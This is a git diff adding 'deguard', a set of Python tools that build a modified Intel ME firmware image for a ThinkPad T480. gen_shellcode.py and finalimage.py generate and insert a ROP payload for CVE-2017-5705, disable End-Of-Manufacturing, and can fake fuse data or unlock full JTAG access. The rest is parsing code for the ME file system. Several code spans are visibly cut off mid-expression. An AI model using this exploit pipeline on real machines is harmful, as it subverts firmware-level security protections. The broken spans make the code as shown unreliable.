AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. 
+ + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/blobs/t480/deguard/doc/LICENSE.orig b/blobs/t480/deguard/doc/LICENSE.orig new file mode 100644 index 00000000..ac6be728 --- /dev/null +++ b/blobs/t480/deguard/doc/LICENSE.orig @@ -0,0 +1,17 @@ +License for MFSUtil (CFG.py, MFS.py, MFSUtil.py) + +Copyright 2019 Youness El Alaoui + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
+ +License for original exploit generator (me_exp_bxtp_me11.py): + +Copyright (c) 2018 Mark Ermolov, Maxim Goryachy at Positive Technologies + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/blobs/t480/deguard/finalimage.py b/blobs/t480/deguard/finalimage.py new file mode 100755 index 00000000..c77f5f4f --- /dev/null +++ b/blobs/t480/deguard/finalimage.py @@ -0,0 +1,111 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +import os +from lib.exploit import GenerateShellCode +from lib.image import parse_ifd_or_me +from lib.mfs import INTEL_IDX, FITC_IDX, HOME_IDX, MFS +from lib.cfg import CFG + +def generate_fitc_from_intel_and_delta(intel_cfg, delta_dir): + # Create empty fitc.cfg + fitc_cfg = CFG() + + for intel_file in intel_cfg.files: + # Copy over directory + if intel_file.isDirectory(): + fitc_cfg.addFile(intel_file.path, intel_file.data, + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + continue + + # Skip non-overridable file + if (intel_file.record.opt & 1) == 0: + continue + + # Look for file in the delta + delta_path = os.path.join(delta_dir, intel_file.path.lstrip("/")) + if os.path.isfile(delta_path): + # Create modified overridable file from delta + with open(delta_path, "rb") as f: + fitc_cfg.addFile(intel_file.path, f.read(), + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + else: + # Copy over unmodified overridable file + fitc_cfg.addFile(intel_file.path, intel_file.data, + intel_file.record.mode, intel_file.record.opt, + intel_file.record.uid, intel_file.record.gid) + + return fitc_cfg + +def apply_exploit_to_fitc(fitc_cfg, version, pch, sku, fake_fpfs, red_unlock): + # Make sure End-Of-Manufacturing is off + fitc_cfg.removeFile("/home/mca/eom") + fitc_cfg.addFile("/home/mca/eom", b"\x00", CFG.strToMode(' --Irw-r-----'), CFG.strToOpt('?!-F'), 0, 238) + + # Generate TraceHub configuration file with exploit payload + ct_payload = GenerateShellCode(version, pch, sku, fake_fpfs, red_unlock) + # Add TraceHub configuration file + fitc_cfg.removeFile("/home/bup/ct") + fitc_cfg.addFile("/home/bup/ct", ct_payload, CFG.strToMode(' ---rwxr-----'), CFG.strToOpt('?--F'), 3, 351) + +def add_fitc_to_sysvol(sysvol, fitc_data): + # Delete original fitc.cfg + sysvol.removeFile(FITC_IDX) + # Delete home partition (we want all data to come from the new fitc.cfg) + sysvol.removeFile(HOME_IDX) + # Insert new fitc.cfg + # NOTE: optimize=False is required to break up continous chunks, + # which 
causes the vulnerable code to perform multiple reads. + sysvol.addFile(FITC_IDX, fitc_data, optimize=False) + +parser = argparse.ArgumentParser() +parser.add_argument("--input", required=True, help="Donor image (either full with IFD or just ME)") +parser.add_argument("--output", required=True, help="Output ME image") +parser.add_argument("--delta", required=True, help="MFS delta directory") +parser.add_argument('--version', required=True, help='Donor ME version') +parser.add_argument('--pch', required=True, help='PCH type') +parser.add_argument('--sku', metavar='', help='ME SKU', required=True) +parser.add_argument('--fake-fpfs', help='replace SRAM copy of FPFs with the provided data') +parser.add_argument('--red-unlock', help='allow full JTAG access to the entire platform', action='store_true') +args = parser.parse_args() + +# Get ME from input image +with open(args.input, "rb") as f: + me = parse_ifd_or_me(f.read()) + +# Make sure delta directory exists +if not os.path.isdir(args.delta): + raise ValueError(f"Delta directory {args.delta} not found") + +# Read FPF data +fake_fpfs = None +if args.fake_fpfs: + with open(args.fake_fpfs, "rb") as f: + fake_fpfs = f.read() + +# Parse MFS and get its system volume +mfs = MFS(me.entry_data("MFS")) +sysvol = mfs.getSystemVolume() + +# Read intel.cfg +intel_cfg = CFG(sysvol.getFile(INTEL_IDX).data) + +# Generate fitc.cfg +fitc_cfg = generate_fitc_from_intel_and_delta(intel_cfg, args.delta) +# Modify fitc.cfg with exploit +apply_exploit_to_fitc(fitc_cfg, args.version, args.pch, args.sku, fake_fpfs, args.red_unlock) +# Re-generate fitc.cfg +fitc_cfg.generate(alignment=2) + +# Write fitc.cfg +add_fitc_to_sysvol(sysvol, fitc_cfg.data) +# Re-generate MFS +mfs.generate() +# Write MFS to ME image +me.write_entry_data("MFS", mfs.data) +# Write out ME image +with open(args.output, "wb") as f: + f.write(me.data) diff --git a/blobs/t480/deguard/gen_shellcode.py b/blobs/t480/deguard/gen_shellcode.py new file mode 100755 index 00000000..1d8fbfbe --- /dev/null +++ b/blobs/t480/deguard/gen_shellcode.py @@ -0,0 +1,24 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +from lib.exploit import GenerateShellCode + +parser = argparse.ArgumentParser(description="Intel-SA-00086 (CVE-2017-5705) exploit generator for ME 11.x.x.x") +parser.add_argument('-o', '--output', metavar='', help='output file path', required=True) +parser.add_argument('-v', '--version', metavar='', help='ME version', required=True) +parser.add_argument('-p', '--pch', metavar='', help='PCH type', required=True) +parser.add_argument('-s', '--sku', metavar='', help='ME SKU', required=True) +parser.add_argument('--fake-fpfs', metavar='', help='replace SRAM copy of FPFs with the provided data') +parser.add_argument('--red-unlock', help='allow full JTAG access to the entire platform', action='store_true') +args = parser.parse_args() + +fake_fpfs = None +if args.fake_fpfs: + with open(args.fake_fpfs, "rb") as f: + fake_fpfs = f.read() + +data = GenerateShellCode(args.version, args.pch, args.sku, fake_fpfs, args.red_unlock) + +with open(args.output, "wb") as f: + f.write(data) diff --git a/blobs/t480/deguard/generatedelta.py b/blobs/t480/deguard/generatedelta.py new file mode 100755 index 00000000..9153d61b --- /dev/null +++ b/blobs/t480/deguard/generatedelta.py @@ -0,0 +1,76 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0-only + +import argparse +import os +from lib.image import parse_ifd_or_me +from lib.mfs import INTEL_IDX, FITC_IDX, HOME_IDX, MFS +from lib.cfg 
import CFG + +def delta_from_fitc_cfg(overridable, fitc_files, output): + if set(fitc_files.keys()).difference(overridable.keys()) != set(): + raise ValueError("fitc.cfg contains unexpected data, please report this for investigation") + # Iterate overridable paths from intel.cfg + for path, intel_file in overridable.items(): + # Skip dirs + if intel_file.isDirectory(): + continue + # Skip files not in fitc + if path not in fitc_files: + continue + fitc_file = fitc_files[path] + if intel_file.data != fitc_file.data: + # Write out differing file to delta + filepath = os.path.join(output, path.lstrip("/")) + os.makedirs(os.path.dirname(filepath), exist_ok=True) + with open(filepath, "wb") as f: + f.write(fitc_file.data) + +def delta_from_home(overridable, home_files, output): + # Iterate overridable paths from intel.cfg + for path, intel_file in overridable.items(): + # Skip dirs + if intel_file.isDirectory(): + continue + # Skip files not in /home + if path not in home_files: + continue + if intel_file.data != home_files[path]: + # Write out differing file to delta + filepath = os.path.join(output, path.lstrip("/")) + os.makedirs(os.path.dirname(filepath), exist_ok=True) + with open(filepath, "wb") as f: + f.write(home_files[path]) + +parser = argparse.ArgumentParser() +parser.add_argument("--input", required=True, help="Input vendor image (either full with IFD or just ME)") +parser.add_argument("--output", required=True, help="Output MFS delta directory") +args = parser.parse_args() + +# Get ME from input image +with open(args.input, "rb") as f: + me = parse_ifd_or_me(f.read()) + +# Parse MFS and get its system volume +mfs = MFS(me.entry_data("MFS")) +sysvol = mfs.getSystemVolume() + +# Lookup table of directories and overridable paths in intel.cfg +intel_cfg = CFG(sysvol.getFile(INTEL_IDX).data) +overridable = { file.path: file for file in intel_cfg.files \ + if file.isDirectory() or (file.record.opt & 1) != 0 } + +fitc = sysvol.getFile(FITC_IDX) + +if fitc: + # We have a fitc.cfg, so compute delta from that + fitc_cfg = CFG(fitc.data) + fitc_files = { file.path: file for file in fitc_cfg.files } + delta_from_fitc_cfg(overridable, fitc_files, args.output) +else: + # If there is no fitc.cfg we must have a /home + if not sysvol.getFile(HOME_IDX): + raise ValueError("MFS has no fitc.cfg or home directory, please provide an image with valid config data") + # Build lookup table from the files in /home + home_files = { path: data for path, data in sysvol.listDir(HOME_IDX, True, "/home") } + delta_from_home(overridable, home_files, args.output) diff --git a/blobs/t480/deguard/lib/cfg.py b/blobs/t480/deguard/lib/cfg.py new file mode 100644 index 00000000..05078210 --- /dev/null +++ b/blobs/t480/deguard/lib/cfg.py @@ -0,0 +1,272 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This code is based on MFSUtil by Youness Alaoui (see `doc/LICENSE.orig` for original copyright) + +import posixpath +import struct +from functools import cmp_to_key + +def cmp(a, b): + return (a > b) - (a < b) + +class CFGAlignment: + ALIGN_NONE = 0 + ALIGN_START = 1 + ALIGN_END = 2 + +class CFG(object): + CFG_FMT = struct.Struct(" 1 + file = self.getFile(posixpath.join(*path)) + assert file and file.isDirectory() + assert file.record.mode == record.mode + path.pop() + else: + file = CFGFile(posixpath.join(*path + [record.name]), record, self.data, parent) + self.files.append(file) + if record.isDirectory(): + path.append(record.name) + parent = self.getFile(posixpath.join(*path)) + self.records.append(record) + + def getFile(self, 
path): + for file in self.files: + if file.path == path: + return file + return None + + def removeFile(self, path, recursive = False): + file = self.getFile(path) + if file: + if len(file.children) > 0 and not recursive: + return False + # Copy list of children since we're modifying the list + for child in file.children[:]: + self.removeFile(child.path, recursive) + self.files.remove(file) + if file.parent: + file.parent.removeChild(file) + return True + else: + return False + + def addFile(self, path, data, mode, opt, uid, gid): + # Make sure it doesn't already exists + file = self.getFile(path) + if file: + raise ValueError(f"CFG path {path} already exists") + + directory = False + (parent_path, filename) = posixpath.split(path) + + if filename == "": + directory = True + (parent_path, filename) = posixpath.split(parent_path) + + # Make sure parent exists if it is not the root + parent = self.getFile(parent_path) + if parent_path != "/"and parent is None: + raise ValueError(f"CFG path {path} already exists") + + record = CFGRecord.createRecord(filename, mode, opt, uid, gid, len(data), 0) + file = CFGFile(path, record, data, parent) + self.files.append(file) + + def generate(self, alignment): + self.records = [] + file_data = b"" + if len(self.files) > 0: + (self.records, file_data) = self.files[0].generateRecords(alignment=alignment) + self.num_records = len(self.records) + self.data = self.CFG_FMT.pack(self.num_records) + data_offset = len(self.data) + CFGRecord.RECORD_FMT.size * self.num_records + alignment_data = b"" + if alignment != CFGAlignment.ALIGN_NONE: + alignment_extra = data_offset % 0x40 + if alignment_extra > 0: + alignment_data += struct.pack("> i): + ret += modeStr[i] + else: + ret += "-" + return ret + + @staticmethod + def strToMode(str): + modeStr = "dAEIrwxrwxrwx" + assert len(str) == len(modeStr) + mode = 0 + for i in range(13): + if str[i] == modeStr[i]: + mode |= (0x1000 >> i) + else: + assert str[i] == '-' or str[i] == ' ' + return mode + + @staticmethod + def optToStr(opt): + assert opt & 0xFFF0 == 0 + optStr = "?!MF" + ret = "" + for i in range(4): + if opt & (8 >> i): + ret += optStr[i] + else: + ret += "-" + return ret + + @staticmethod + def strToOpt(str): + optStr = "?!MF" + assert len(str) == len(optStr) + opt = 0 + for i in range(4): + if str[i] == optStr[i]: + opt |= (8 >> i) + else: + assert str[i] == '-' or str[i] == ' ' + return opt + +class CFGRecord(object): + RECORD_FMT = struct.Struct("<12sHHHHHHL") + + def __init__(self, data, index): + offset = CFG.CFG_FMT.size + self.RECORD_FMT.size * index + self.data = data[offset:offset + self.RECORD_FMT.size] + (self.name, zero, self.mode, self.opt, self.size, + self.uid, self.gid, self.offset) = self.RECORD_FMT.unpack(self.data) + self.name = self.name.decode('utf-8') + self.name = self.name.strip('\0') + if self.name == "..": + assert self.isDirectory() + assert self.opt == 0 + if self.isDirectory(): + assert self.size == 0 + + def isDirectory(self): + return self.mode & 0x1000 == 0x1000 + + def generate(self): + self.data = CFGRecord.RECORD_FMT.pack(self.name.encode("utf-8"), 0, self.mode, self.opt, + self.size, self.uid, self.gid, self.offset) + + @staticmethod + def createRecord(name, mode, opt, uid, gid, size, offset): + data = b'\0' * CFG.CFG_FMT.size + \ + CFGRecord.RECORD_FMT.pack(name.encode("utf-8"), 0, mode, opt, size, uid, gid, offset) + return CFGRecord(data, 0) + + def copy(self): + return self.createRecord(self.name, self.mode, self.opt, self.uid, self.gid, self.size, self.offset) + + def 
__str__(self): + return "%-12s (%04X:%04X) [%4d bytes @ %8X] %s _ %s" % (self.name, self.uid, self.gid, + self.size, self.offset, CFG.modeToStr(self.mode), CFG.optToStr(self.opt)) + +class CFGFile(object): + def __init__(self, path, record, data, parent=None): + self.path = path + self.record = record + self.data = data[record.offset:record.offset + record.size] + self.parent = parent + self.children = [] + if parent: + parent.addChild(self) + + @property + def size(self): + return self.record.size + + def isDirectory(self): + return self.record.isDirectory() + + def addChild(self, child): + assert self.isDirectory() + self.children.append(child) + self.children.sort(key=cmp_to_key(CFGFile.__cmp__)) + + def removeChild(self, child): + assert self.isDirectory() and child in self.children + self.children.remove(child) + + def generateRecords(self, data = b"", alignment=CFGAlignment.ALIGN_NONE): + self.record.size = 0 if self.isDirectory() else self.size + self.record.offset = 0 if self.isDirectory() else len(data) + records = [self.record] + if self.isDirectory(): + for child in self.children: + (sub_records, new_data) = child.generateRecords(data, alignment) + records += sub_records + data = new_data + + dotdot = self.record.copy() + dotdot.name = '..' + dotdot.opt = 0 + records.append(dotdot) + else: + alignment_extra = 0 + if alignment == CFGAlignment.ALIGN_START: + alignment_extra = self.record.offset % 0x40 + elif self.record.size != 0 and alignment == CFGAlignment.ALIGN_END: + alignment_extra = (self.record.offset + self.record.size) % 0x40 + if alignment_extra > 0: + data += struct.pack(" pointing to valid descriptors below +# shared mem descriptors with address of memcpy_s ret address +# up to 0x380 with syslib context pointing up +# chunk with pointers to ROP address + +def GenerateShellCode(version, pch, sku, fake_fpfs, red_unlock): + me_info = None + for info in ME_INFOS: + if info.ME_VERSION == version and info.PCH_TYPE == pch and info.ME_SKU == sku: + me_info = info + break + + if me_info is None: + raise ValueError("Cannot find required information for ME version, PCH type, and ME SKU.") + + # Add ROPs + data, rops_start = GenerateRops(me_info, fake_fpfs, red_unlock) + if data is None: + return None + + # Create syslib context and add it to the data + syslib_ctx_addr = me_info.BUFFER_ADDRESS + len(data) + (syslib_ctx, syslib_ctx_addr) = GenerateSyslibCtx(me_info, syslib_ctx_addr) + data += syslib_ctx + + # Create TLS structure + tls = struct.pack(" me_info.BUFFER_OFFSET: + raise ValueError("Too much data in the ROPs, cannot fit payload within 0x%X bytes" % me_info.BUFFER_OFFSET) + + # Add padding and add TLS at the end of the buffer + data += struct.pack("len(data): + return None + return struct.unpack("len(data): + return None + return struct.unpack("> bf[0] & bf[1] + +class IFDRegion(Enum): + IFD = 0 + BIOS = 1 + ME = 2 + GBE = 3 + PD = 4 + EC = 8 + +class IFDImage: + MAGIC_OFF = 0x10 + MAGIC = 0x0FF0A55A + + FLMAP0_OFF = 0x14 + FLMAP0_FRBA = (16, 0xff) + + FLREGN_BASE = (0, 0x7fff) + FLREGN_LIMIT = (16, 0x7fff) + + def __init__(self, data): + self.data = bytearray(data) + + # Verify magic + if dword_le(self.data, self.MAGIC_OFF) != self.MAGIC: + raise ValueError("Invalid IFD magic") + + # Find base address of regions + flmap0 = dword_le(self.data, self.FLMAP0_OFF) + frba = ex(flmap0, self.FLMAP0_FRBA) << 4 + + # Parse regions + self.regions = {} + for region in IFDRegion: + flregN = dword_le(self.data, frba + 4 * region.value) + base = ex(flregN, self.FLREGN_BASE) + limit = 
ex(flregN, self.FLREGN_LIMIT) + if base == 0x7fff and limit == 0x0000: # Unused region + continue + self.regions[region] = (base << 12, limit << 12 | 0xfff) + + def __str__(self): + return "\n".join(f" {region.name:<4} {extent[0]:08x}-{extent[1]:08x}" \ + for region, extent in self.regions.items()) + + def region_data(self, region): + if region not in self.regions: + raise ValueError(f"IFD region {region} not present") + base, limit = self.regions[region] + return self.data[base:limit] + +class MeImage: + HEADER_OFF = 0x10 + + MARKER_OFF = 0x10 + MARKER = b"$FPT" + + NUMENT_OFF = 0x14 + HDRLEN_OFF = 0x20 + HDRSUM_OFF = 0x21 + + ENTRY_OFF = 0x30 + ENTRY_SIZE = 0x20 + + def __init__(self, data): + self.data = bytearray(data) + + # Verify magic and checksum + if self.data[self.MARKER_OFF:self.MARKER_OFF+4] != self.MARKER: + raise ValueError("Invalid $FPT magic") + if sum(self.data[self.HEADER_OFF:self.data[self.HDRLEN_OFF]]) != 0: + raise ValueError("Invalid $FPT checksum") + + # Parse entries + self.entries = {} + for idx in range(self.data[self.NUMENT_OFF]): + off = self.ENTRY_OFF + idx * self.ENTRY_SIZE + name, _, offset, length, _, _, _, flags = struct.unpack("<4sIIIIIII", \ + self.data[off:off+self.ENTRY_SIZE]) + self.entries[name.strip(b"\0").decode()] = (offset, length, flags) + + def __str__(self): + return "\n".join(f" {name:<4} {entry[0]:08x}-{entry[1]:08x} {entry[2]:08x}" \ + for name, entry in self.entries.items()) + + def entry_data(self, name): + if name not in self.entries: # No entry + raise ValueError(f"Unknown $FPT entry {name}") + offset, length, flags = self.entries[name] + if flags & 0xff00_0000 != 0: # Invalid entry + raise ValueError(f"Invalid $FPT entry {name}") + return self.data[offset:offset+length] + + def write_entry_data(self, name, data): + if name not in self.entries: # No entry + raise ValueError(f"Unknown $FPT entry {name}") + offset, length, flags = self.entries[name] + if flags & 0xff00_0000 != 0: # Invalid entry + raise ValueError(f"Invalid $FPT entry {name}") + if len(data) != length: + raise ValueError(f"Wrong data length") + self.data[offset:offset+length] = data + +def parse_ifd_or_me(data): + try: + # Try parse as full image + ifd_image = IFDImage(data) + return MeImage(ifd_image.region_data(IFDRegion.ME)) + except: + # Assume it is just an ME + return MeImage(data) diff --git a/blobs/t480/deguard/lib/mfs.py b/blobs/t480/deguard/lib/mfs.py new file mode 100644 index 00000000..9dee71bc --- /dev/null +++ b/blobs/t480/deguard/lib/mfs.py @@ -0,0 +1,508 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This code is based on MFSUtil by Youness Alaoui (see `doc/LICENSE.orig` for original copyright) + +import struct +from functools import cmp_to_key + +INTEL_IDX = 6 # Default configuration +FITC_IDX = 7 # Vendor configuration +HOME_IDX = 8 # Runtime ME data + +def cmp(a, b): + return (a > b) - (a < b) + +class MFS(object): + PAGE_SIZE = 0x2000 # Page size is 8K + CHUNK_SIZE = 0x40 # Chunk size is 64 bytes + CHUNK_CRC_SIZE = 2 # Size of CRC16 + CHUNKS_PER_DATA_PAGE = 122 # 122 chunks per Data page + CHUNKS_PER_SYSTEM_PAGE = 120 # 120 chunks per System page + + CRC8TabLo = bytearray([0, 7, 14, 9, 28, 27, 18, 21, 56, 63, 54, 49, 36, 35, 42, 45]) + CRC8TabHi = bytearray([0, 112, 224, 144, 199, 183, 39, 87, 137, 249, 105, 25, 78, 62, 174, 222]) + CRC16Tab = [0]*256 + for i in range(256): + r = i << 8 + for j in range(8): r = (r << 1) ^ (0x1021 if r & 0x8000 else 0) + CRC16Tab[i] = r & 0xFFFF + + def __init__(self, data): + self.data = data + self.size = 
len(self.data) + assert self.size % self.PAGE_SIZE == 0 + + self.num_pages = self.size // self.PAGE_SIZE # Total number of pages + self.num_sys_pages = self.num_pages // 12 # Number of System pages + self.num_data_pages = self.num_pages - self.num_sys_pages - 1 # Number of Data pages + self.capacity = self.num_data_pages * self.CHUNKS_PER_DATA_PAGE * self.CHUNK_SIZE + + self.data_pages = [] + self.sys_pages = [] + self.to_be_erased = None + for page in range(self.num_pages): + page = MFSPage(self.data[page * self.PAGE_SIZE:(page + 1) * self.PAGE_SIZE], page) # Load page + if page.isToBeErased(): + assert self.to_be_erased == None + self.to_be_erased = page + elif page.isSystemPage(): + self.sys_pages.append(page) + else: + self.data_pages.append(page) + + assert self.num_sys_pages == len(self.sys_pages) + assert self.num_data_pages == len(self.data_pages) + + self.sys_pages.sort(key=cmp_to_key(MFSPage.__cmp__)) + self.data_pages.sort(key=cmp_to_key(MFSPage.__cmp__)) + + self.system_volume = MFSSystemVolume(self.sys_pages, self.data_pages) + + + def getSystemVolume(self): + return self.system_volume + + def generate(self): + for sys_page in self.sys_pages: + sys_page.resetChunks() + for data_page in self.data_pages: + data_page.resetChunks() + + self.system_volume.generate() + system_chunks = self.system_volume.generateChunks() + for i in range(0, len(self.sys_pages)): + chunks = system_chunks[i * MFS.CHUNKS_PER_SYSTEM_PAGE: (i+1) * MFS.CHUNKS_PER_SYSTEM_PAGE] + self.sys_pages[i].setChunks(chunks) + self.sys_pages[i].generate() + + for file in self.system_volume.iterateFiles(): + chunks = file.generateChunks() + for chunk in chunks: + data_page_idx = (chunk.id - self.system_volume.total_chunks) // MFS.CHUNKS_PER_DATA_PAGE + self.data_pages[data_page_idx].addChunk(chunk) + for data_page in self.data_pages: + data_page.generate() + self.data = b"" + for sys_page in self.sys_pages: + self.data += sys_page.data + for data_page in self.data_pages: + self.data += data_page.data + self.data += self.to_be_erased.data + + def __str__(self): + res = f"Pages : {self.num_pages} ({self.num_sys_pages} System && {self.num_data_pages} Data)\nSystem Pages:\n" + for i in range(self.num_sys_pages): + res += f" {i}: {self.sys_pages[i]}\n" + res += "Data Pages:\n" + for i in range(self.num_data_pages): + res += f" {i}: {self.data_pages[i]}\n" + res += f"\nSystem Volume : \n{self.system_volume}" + return res + + @staticmethod + def CrcIdx(w, crc=0x3FFF): + for b in bytearray(struct.pack("> 8)] ^ (crc << 8)) & 0x3FFF + return crc + + @staticmethod + def Crc16(ab, crc=0xFFFF): + for b in bytearray(ab): + crc = (MFS.CRC16Tab[b ^ (crc >> 8)] ^ (crc << 8)) & 0xFFFF + return crc + + @staticmethod + def Crc8(ab): + csum = 1 + for b in bytearray(ab): + b ^= csum + csum = MFS.CRC8TabLo[b & 0xF] ^ MFS.CRC8TabHi[b >> 4] + return csum + +class MFSPage(object): + PAGE_HEADER_FMT = struct.Struct("= self.first_chunk and \ + id < self.first_chunk + MFS.CHUNKS_PER_DATA_PAGE: + return self.chunks[id - self.first_chunk] + return None + + def resetChunks(self): + if self.isSystemPage(): + self.chunks = [] + else: + self.chunks = [None] * MFS.CHUNKS_PER_DATA_PAGE + + def setChunks(self, chunks): + self.chunks = chunks + + def addChunk(self, chunk): + id = chunk.id + assert self.isDataPage() and \ + id >= self.first_chunk and \ + id < self.first_chunk + MFS.CHUNKS_PER_DATA_PAGE + self.chunks[id - self.first_chunk] = chunk + + def generate(self): + data = self.PAGE_HEADER_FMT.pack(self.signature, self.USN, self.num_erase, 
self.next_erase, + self.first_chunk, 0, 0) + crc = MFS.Crc8(data[:-2]) + data = self.PAGE_HEADER_FMT.pack(self.signature, self.USN, self.num_erase, self.next_erase, + self.first_chunk, crc, 0) + if self.isSystemPage(): + assert len(self.chunks) <= MFS.CHUNKS_PER_SYSTEM_PAGE + chunk_ids = [] + last_chunk_id = 0 + for i, chunk in enumerate(self.chunks): + chunk_ids.append(MFS.CrcIdx(last_chunk_id) ^ chunk.id) + last_chunk_id = chunk.id + if len(self.chunks) == MFS.CHUNKS_PER_SYSTEM_PAGE or len(self.chunks) == 0: + chunk_ids.append(0xFFFF) + else: + # Use case of exactly 120 chunks in the last system page... + chunk_ids.append(0x7FFF) + chunk_ids += [0xFFFF] * (MFS.CHUNKS_PER_SYSTEM_PAGE - len(self.chunks)) + assert len(chunk_ids) == MFS.CHUNKS_PER_SYSTEM_PAGE + 1 + data += self.SYSTEM_PAGE_INDICES_FMT.pack(*chunk_ids) + for chunk in self.chunks: + data += chunk.getRawData() + data += b'\xFF' * ((MFS.CHUNKS_PER_SYSTEM_PAGE - len(self.chunks)) * \ + (MFS.CHUNK_SIZE + MFS.CHUNK_CRC_SIZE) + 0xC) + else: + assert len(self.chunks) == MFS.CHUNKS_PER_DATA_PAGE + data_free = [] + for i, chunk in enumerate(self.chunks): + if chunk: + assert chunk.id == self.first_chunk + i + data_free.append(0) + else: + data_free.append(0xFF) + data += self.DATA_PAGE_INDICES_FMT.pack(*data_free) + for i, chunk in enumerate(self.chunks): + if chunk: + data += chunk.getRawData() + else: + data += b"\xFF" * (MFS.CHUNK_SIZE + MFS.CHUNK_CRC_SIZE) + assert len(data) == MFS.PAGE_SIZE + self.data = data + + def __cmp__(self, other): + assert self.signature == other.signature and not self.isToBeErased() + assert self.isSystemPage() == other.isSystemPage() + if self.isSystemPage(): + return cmp(self.USN, other.USN) + else: + return cmp(self.first_chunk, other.first_chunk) + + def __str__(self): + if self.isToBeErased(): + return "ToBeErased" + if self.isSystemPage(): + chunk_ids = set() + for i in range(len(self.chunks)): + chunk_ids.add(str(self.chunks[i].id)) + chunk_ids = list(chunk_ids) + chunk_ids.sort() + res = "System-%d (USN: 0x%X): %s" % (self.page_id, self.USN, ", ".join(chunk_ids)) + else: + res = "Data-%d: %X" % (self.page_id, self.first_chunk) + return res + + def __repr__(self): + return str(self) + +class MFSChunk(object): + def __init__(self, data, chunk_id, raw=True): + self.chunk_id = chunk_id + if raw: + assert len(data) == MFS.CHUNK_SIZE + 2 + self.data = data[:-2] + self.crc, = struct.unpack(" 0: + data_chunk_idx = chain - self.num_files + page_idx = data_chunk_idx 